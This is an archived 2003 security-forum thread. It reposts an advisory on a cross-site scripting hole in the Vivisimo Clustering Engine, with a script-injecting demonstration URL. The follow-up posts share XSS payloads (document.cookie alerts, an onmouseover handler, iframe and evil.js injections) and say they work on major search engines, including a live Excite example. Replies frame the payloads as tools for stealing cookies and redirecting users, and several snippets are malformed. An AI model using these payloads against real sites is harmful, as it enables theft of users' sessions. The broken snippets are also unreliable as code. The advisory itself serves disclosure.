hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
ssj4conejo
Oct 19 2003, 04:22 AM
nice one comsec, now i'm gonna try to see if that works with other searach engines = ).
seems like u have to use ur imagination to make this one malicious ph34r.gif
ComSec
Oct 18 2003, 02:27 PM
Vivisimo Clustering Engine Input Validation Flaw Permits Remote Cross-Site Scripting Attacks

http://www.securitytracker.com/alerts/2003...ct/1007955.html

-------------------------------------------

SecurityTracker Alert ID: 1007955
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 18 2003

Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information

Exploit Included: Yes

Description: ComSec of governmentsecurity.org reported an input validation vulnerability in the Vivisimo Clustering Engine. A remote user can conduct cross-site scripting attacks.

It is reported that the Clustering Engine does not filter HTML code from user-supplied input before displaying the input as part of a search query results. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Clustering Engine software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/search?query=<script>alert("Hello" )</script><script>alert("goodbye")</script>

Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Clustering Engine, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution: No solution was available at the time of this entry.

Vendor URL: http://vivisimo.com/products/Clustering_En...troduction.html (Links to External Site)

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: ComSec <comsec@governmentsecurity.org>

Message History: None.

Vendor...now informed

------
ComSec
Oct 19 2003, 12:23 PM
well it works on quite a few of the major engines....you can steal cookies, re-direct , etc ,etc

simple one....try this for cookies

<script>alert(document.cookie);</script>

or with a bit extra

<script>alert(document.cookie)</script>
<a href="X" onmouseover="alert(document.cookie">
<javascript ="http://www.host/script.js"
"javascript:alert(document.cookie)"
<iframe = c:\>
<img src = "evil.js">

example:

<script>alert(document.cookie);</script>

using Excite

http://www.infospace.com/info.xcite/dog/ne...</SCRIPT>

wink.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.